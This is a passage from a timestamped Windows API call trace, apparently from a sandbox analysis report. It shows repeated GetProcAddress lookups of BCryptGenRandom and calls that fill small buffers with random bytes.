(in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.098] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.098] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.098] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.098] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.099] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.099] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.099] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.099] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.099] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0185.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.100] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.100] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0185.101] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0247c, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x3a0247c) returned 0x0 [0185.101] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.101] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.101] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.102] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.102] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.103] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.104] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.105] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.105] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.106] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.106] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.107] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.107] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0185.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.108] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.108] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0185.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.109] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.110] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.110] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.111] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0185.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.112] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a024a6, cbBuffer=0x11, dwFlags=0x2 | out: pbBuffer=0x3a024a6) returned 0x0 [0185.112] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.260] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.260] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.260] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.260] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.260] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.261] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.261] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.261] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.261] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0185.261] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.261] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.261] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.261] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.262] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.262] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.262] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.262] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0185.263] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.263] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.263] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0185.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a024b7, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x3a024b7) returned 0x0 [0185.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.265] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.265] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.265] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.265] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.265] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.265] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.265] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.265] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.266] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.266] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.266] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.267] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.267] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.267] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.268] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.269] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0185.270] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a024d0, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a024d0) returned 0x0 [0185.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.271] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.272] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.273] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.273] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0185.274] GetProcAddress 